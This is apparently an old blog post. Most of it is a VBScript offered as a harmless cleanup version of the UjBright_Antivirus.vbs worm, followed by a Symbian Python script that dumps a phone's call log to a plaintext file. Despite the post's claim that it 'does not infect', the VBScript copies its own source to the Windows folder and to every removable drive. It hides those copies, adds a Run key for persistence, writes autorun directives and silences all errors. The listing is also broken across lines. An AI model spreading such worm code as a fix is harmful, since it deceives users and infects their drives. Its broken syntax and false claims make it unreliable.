The file UjBright_Antivirus.vbs infects systems: it changes the settings under Explorer > Tools > Folder Options so that hidden files are NOT shown, and it disables registry editing so that we cannot stop the virus from being active.
I changed the file UjBright_Antivirus.vbs;
I changed the registry entries to re-enable whatever this file was disabling, and I added code so that it ends the viral script.
Copy this file to the /systemroot/windows/ folder. It will run once and then stop. It does not infect; it only clears the changes made by the virus. (As listed below, it still writes a copy of itself under a .txt name to the Windows folder and to each removable drive, and sets a Run value named autoMe, so those are the artifacts it leaves behind.)
===================
' Modified copy of the UjBright_Antivirus.vbs script described above (setup part).
' What these lines do, in order: read the script's own text, write it to the
' Windows folder as UjBright_Antivirus_vbs.txt with hidden/system attributes,
' add a Run value named autoMe, and try to launch the copy.
' Artifacts a responder can look for: <Windows folder>\UjBright_Antivirus_vbs.txt
' and the HKLM ...\CurrentVersion\Run\autoMe value.
' NOTE(review): as published, several statements and string literals are broken
' across lines without a continuation character, so the listing does not parse as-is.
' Every runtime error is ignored from here on, so a failed file or registry
' operation is silent.
On Error Resume Next
Dim fso, wscr, tf, scrText, win, ax
Set fso = CreateObject("Scripting.FileSystemObject")
Set wscr = CreateObject("WScript.Shell")
' GetSpecialFolder(0) is the Windows folder.
win = fso.GetSpecialFolder(0)
' Full path of the running script.
tf = WScript.ScriptFullName
' x is not in the Dim list; it is created implicitly.
x = LCase(tf)
' Compares the path from its 4th character on (after the drive prefix) with the
' file name, i.e. "is this copy running from a drive root".
' NOTE(review): x was lower-cased but the literal contains upper-case letters,
' so this comparison looks like it can never be true - confirm.
If Mid(x, 4) = "UjBright_Antivirus_vbs.txt" Then
' Opens an Explorer window on the drive the script was started from.
wscr.Run "explorer.exe " & fso.Getfile(tf).Drive.Path
End If
' Read the script's own source into scrText; this text is what gets written
' to the Windows folder here and to removable drives later in the script.
Set myFile = fso.Getfile(tf).OpenAsTextStream(1)
Do Until myFile.AtEndOfStream
scrText = scrText & myFile.ReadLine & vbCrLf
Loop
' Remember whether a copy already existed in the Windows folder before writing.
ax = fso.FileExists(win & "\UjBright_Antivirus_vbs.txt")
' Write (overwrite = true) the copy into the Windows folder.
Set myFile = fso.CreateTextFile(win &
"\UjBright_Antivirus_vbs.txt", true)
myFile.write scrText
myFile.close
' 39 = ReadOnly (1) + Hidden (2) + System (4) + Archive (32): the copy is
' hidden from a default Explorer view.
Set fAttr = fso.Getfile(win & "\UjBright_Antivirus_vbs.txt")
fAttr.Attributes=39
' Logon persistence: a Run value named autoMe whose data is the quoted path of
' the copy (with a leading space).
' NOTE(review): the target has a .txt name, so at logon it would presumably be
' opened by the .txt file association rather than run as a script - confirm.
wscr.RegWrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
autoMe", " """ & win & "\UjBright_Antivirus_vbs.txt"""
' Only when no copy existed before: start the copy with wscript.exe.
' NOTE(review): wscript chooses the script engine from the file extension, so
' this launch presumably fails for a .txt name - confirm.
If ax = false Then wscr.Run "wscript.exe """ & win &
"\UjBright_Antivirus_vbs.txt"""
' Main loop of the modified script. Because of the unconditional WScript.Quit
' near the end, the body runs once: it writes three files to every removable
' drive, resets a set of Explorer/policy registry values, waits 10 seconds and exits.
' Errors are suppressed by the On Error Resume Next at the top of the script.
' Files left on each removable drive: Autorun_inf.txt, README_MIT_.txt and
' UjBright_Antivirus_vbs.txt (the first and last with hidden/system attributes).
While (true)
Set myDrives = fso.Drives
For Each myFlashDrive In myDrives
' DriveType 1 is a removable drive; A: is skipped.
If myFlashDrive.Drivetype = 1 And myFlashDrive.Path <> "A:"
Then
' NOTE(review): the existence test is on Autorun.inf, but the file that is
' un-hidden (32 = Archive only) and deleted is Autorun_inf.txt; an Autorun.inf
' already present on the drive is left untouched by these lines.
If fso.FileExists(myFlashDrive.Path & "\Autorun.inf")
Then
Set fAttr = fso.Getfile(myFlashDrive.Path &
"\Autorun_inf.txt")
fAttr.Attributes=32
fso.Deletefile myFlashDrive.Path & "\Autorun_inf.txt",
true
End If
' Writes autorun-style directives that reference UjBright_Antivirus_vbs.txt
' into a file named Autorun_inf.txt.
' NOTE(review): Windows AutoRun reads a file named Autorun.inf, so under this
' name the directives are presumably inert - confirm.
Set auFile = fso.CreateTextFile(myFlashDrive.Path &
"\Autorun_inf.txt", true)
auFile.write "[autorun]" & vbCrLf & "open=\" & vbCrLf &
"open=wscript.exe UjBright_Antivirus_vbs.txt" & vbCrLf &
"shell\Open\Command=wscript.exe UjBright_Antivirus_vbs.txt" &
vbCrLf & "shell\Open\Default=1"
auFile.close
' Drops a README text file on the drive.
Set auFile = fso.CreateTextFile(myFlashDrive.Path &
"\README_MIT_.txt", true)
auFile.write "Hello FRIENDS:" & vbCrLf & "" & vbCrLf & ""
& vbCrLf & "" & vbCrLf & " " & vbCrLf & "modified to negate virus
infection by DR.MHMD IMRAN T., +919441119044 Hyderabad, India" &
vbCrLf & " " & vbCrLf & "PARA SA GUSTONG MAGPA-ADVERTISE:" &
vbCrLf & "He wrote the virus >>> JUST CONTACT ME: 09083223171 -
UJBRIGHT"
auFile.close
' 39 = ReadOnly + Hidden + System + Archive on the Autorun_inf.txt just written.
Set fAttr = fso.Getfile(myFlashDrive.Path &
"\Autorun_inf.txt")
fAttr.Attributes=39
' Writes the script's own text (scrText) to the drive and hides it the same
' way, so every removable drive attached at this moment receives a copy.
Set myFile = fso.CreateTextFile(myFlashDrive.Path &
"\UjBright_Antivirus_vbs.txt", true)
myFile.write scrText
myFile.close
Set fAttr = fso.Getfile(myFlashDrive.Path &
"\UjBright_Antivirus_vbs.txt")
fAttr.Attributes=39
End If
Next
' Registry values written below.
' NOTE(review): the Run\autoMe data names UjBright_Antivirus.txt (no "_vbs"),
' a file this listing never creates, so the Run value presumably points at
' nothing - confirm.
' NOTE(review): Explorer's documented values for Hidden are 1 (show hidden
' files) and 2 (do not show); confirm that 0 gives the intended result.
' HideFileExt = 0 shows file extensions; ShowSuperHidden = 0 keeps protected
' system files hidden.
' NoFolderOptions, DisableRegistryTools and DisableTaskMgr are set to 0, which
' lifts those three restrictions for the current user.
' NOTE(review): NoDriveTypeAutoRun = 128 (0x80) sets only the highest bit of the
' mask; the value that turns AutoRun off for every drive type is 255 (0xFF) -
' confirm which was intended.
With wscr
.RegWrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
autoMe", " """ & win & "\UjBright_Antivirus.txt"""
.RegWrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explo
rer\Advanced\Hidden", 0, "REG_DWORD"
.RegWrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explo
rer\Advanced\HideFileExt", 0, "REG_DWORD"
.RegWrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explo
rer\Advanced\ShowSuperHidden", 0, "REG_DWORD"
.RegWrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Polic
ies\Explorer\NoFolderOptions", 0, "REG_DWORD"
.RegWrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Polic
ies\Explorer\NoDriveTypeAutoRun", 128, "REG_DWORD"
.RegWrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Polic
ies\System\DisableRegistryTools", 0, "REG_DWORD"
.RegWrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Polic
ies\System\DisableTaskMgr", 0, "REG_DWORD"
End With
' When not running from the named path in the Windows folder, quit at once if
' the drive the script was started from is no longer ready (removed).
If tf <> win & "\UjBright_Antivirus.txt" Then
If fso.Getfile(tf).Drive.IsReady = false Then WScript.Quit
End If
' Wait 10 seconds, then exit unconditionally: the While body never repeats.
WScript.Sleep 10000
WScript.Quit
Wend
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Sunday, November 8, 2009
Wednesday, November 4, 2009
Save CallLogs using python
from __future__ import division
import logs
import appuifw
import e32
import time
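# Append every outgoing, missed and incoming call from the phone's call log to
# a text file, one record per line in the form
#   YYYY/MM/DD-HH:MM:SS M:<direction> D:<duration> N:<number> ;
# NOTE(review): the file keeps phone numbers and call times in plaintext at a
# fixed path on E: (presumably the memory card), so anyone who can read that
# drive can read the call history.
fn=u"E:\\system\\Apps\\Python\\logs\\logs.txt"
logfile = open(fn,"a")
e=['out', 'missed', 'in']
try:
    for x in e:
        # logs.calls(mode=x) is indexed below as a sequence of dict-like
        # entries with "time", "direction", "duration" and "number" keys.
        for entry in logs.calls(mode=x):
            dim=time.localtime(entry["time"])
            dateim=time.strftime("%Y/%m/%d-%H:%M:%S", dim)
            s=str(dateim)+" M:"+str(entry["direction"])
            s=s+" D:"+str(entry["duration"])
            s=s+" N:"+str(entry["number"])
            # trailing " ;" lets the file be split into records later
            s=s+" ;"
            logfile.write(s+'\n')
finally:
    # close the file even when reading the log or writing a record fails
    logfile.close()
# medzindia.blogspot.com
appuifw.note(u"log Written. MIT....Email:imran-doc@hotmail.com,",'info')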
Output:-
2009/mo/da-hh:mm:ss M:Outgoing N:1234567890 ;
2009/mo/da-hh:mm:ss M:Missed call N:1234567890 ;
2009/mo/da-hh:mm:ss M:Incoming N:1234567890 ;
----------------------------------------------------
comments:-
from __future__ import division
import logs
import appuifw
import e32
import time
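# path of the log file to write (a plain string, not a file object)
# the u prefix makes it a UNICODE string
# the backslashes are doubled because "\" starts an escape sequence;
# an r prefix (raw string) is the other way to write a Windows-style path
# NOTE(review): the file keeps phone numbers and call times in plaintext at a
# fixed path on E: (presumably the memory card), so anyone who can read that
# drive can read the call history
fn=u"E:\\system\\Apps\\Python\\logs\\logs.txt"
# open the file named by fn
# r to read
# w to write
# a to append
# add b to the mode for binary files
logfile = open(fn,"a")
# declare a list holding the three call modes
e=['out', 'missed', 'in']
# try/finally makes sure the file is closed even if reading the call log or
# writing a record fails part-way
try:
    # loop once for each mode: outgoing, missed and incoming calls
    # x takes the values out, missed and in, in that order
    # the body of 'for x in e:' is executed three times
    for x in e:
        # fetch the call log for the current mode, starting with outgoing,
        # and walk through every entry of that mode until the list ends
        for entry in logs.calls(mode=x):
            # convert the entry's time in seconds since 1970 (UTC) to localtime
            dim=time.localtime(entry["time"])
            # convert the dim tuple to a standard format with strftime
            dateim=time.strftime("%Y/%m/%d-%H:%M:%S", dim)
            # start string s with the formatted localtime, add " M:" and the
            # direction of the call as reported by the log entry
            # (the value of x from 'for x in e:' could be used instead)
            s=str(dateim)+" M:"+str(entry["direction"])
            # the duration of the call, preceded by " D:"
            s=s+" D:"+str(entry["duration"])
            # the number called (second party), preceded by " N:"
            s=s+" N:"+str(entry["number"])
            # a semicolon so that the final file can be parsed into a database
            s=s+" ;"
            # write string s to the file along with a newline
            logfile.write(s+'\n')
        # here the inner loop has ended; 'for x in e:' continues with the
        # next value of x and ends after three runs
finally:
    # close the file
    logfile.close()
# medzindia.blogspot.com
# flash an 'info' note on the screen; the u prefix makes the text UNICODE
appuifw.note(u"log Written. MIT....Email:imran-doc@hotmail.com,",'info')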